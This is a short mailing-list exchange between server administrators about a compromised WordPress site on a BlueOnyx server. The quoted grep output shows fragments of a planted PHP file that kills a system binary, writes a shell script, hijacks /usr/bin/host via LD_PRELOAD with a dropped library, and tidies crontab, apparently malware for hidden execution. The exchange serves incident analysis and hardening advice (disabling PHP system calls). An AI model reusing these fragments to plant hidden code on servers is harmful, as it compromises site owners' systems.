[BlueOnyx:17919] Re: 5106R cfsadmin load issue
Gerald Waugh
gwaugh at frontstreetnetworks.com
Sat Jun 27 13:23:07 -05 2015
On 06/27/2015 12:49 PM, Michael Stauber wrote:
> Hi Gerald,
>
>> OK here is the hack
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall
>> -9 ".basename("*/usr/bin/host*"));
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f =
>> fopen("/usr/bin/host", "rb");
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("
>> */usr/bin/host*");
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh",
>> "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9
>> $HBN;export AU='".$AU."'\nexport
>> LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep
>> -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
> Nice catch. :o)
>
> But I had to say it: The default security settings of PHP do not allow
> PHP scripts to use system() calls. Apparently it was allowed for this
> site and that allowed the scripts to do their malicious job.
>
> Might be a good idea to disallow system() calls again on that box.
>
OK, thanks
More information about the Blueonyx
mailing list